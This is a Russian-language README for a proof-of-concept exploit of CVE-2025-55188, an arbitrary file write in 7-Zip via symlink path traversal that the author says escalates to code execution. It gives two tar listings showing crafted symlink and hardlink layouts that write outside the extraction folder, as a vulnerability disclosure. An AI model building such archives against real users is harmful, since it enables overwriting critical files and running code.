
Эксплойт-доказательство концепции для CVE-2025-55188, демонстрирующий произвольную запись файлов в 7-Zip через обход пути с помощью символических ссылок с последующей эскалацией до произвольного выполнения кода.
Доказательство концепции для CVE-2025-55188 — произвольная запись файла в 7-Zip. Исправлено в версии 25.01, выпущенной 3 августа 2025 года.
Примечание: CVE-2025-55188 отличается от CVE-2025-11001.
Версия, в которой было исправлено CVE-2025-11001 (версия 25.00), по-прежнему уязвима к произвольному выполнению кода через атаки с символическими ссылками из-за CVE-2025-55188.
CVE-2025-55188 был обнаружен и опубликован до публикации CVE-2025-11001.
См. https://lunbun.dev/blog/cve-2025-55188/ для более подробного объяснения и отчёта.
Уязвимость довольно проста.
Обход пути осуществляется через символические ссылки для произвольной записи файлов. Оттуда произвольная запись файла может быть повышена до произвольного выполнения кода путём записи в критически важные файлы.
Обход пути через символические ссылки возможен из-за крайнего случая в проверках безопасности символических ссылок. Я обнаружил два способа сделать это. Подробнее см. в сообщении блога.
Следующий .tar-файл при извлечении запишет данные в ../a/b/file.txt:
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/link -> ../a/b
hrwxr-xr-x 0/0 0 1969-12-31 16:00 link link to a/link
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_hardlink содержит код, использующий метод жёстких ссылок.
Следующий .tar-файл при извлечении запишет данные в ../file.txt (только в Linux):
$ tar -tvf write.tar
lrw-r--r-- 0/0 0 1969-12-31 16:00 a/b/link -> /a
lrw-r--r-- 0/0 0 1969-12-31 16:00 link -> a/b/link/../../
-rw-r--r-- 0/0 44 1969-12-31 16:00 link/file.txt
poc_extraction_root содержит код, использующий метод корня извлечения.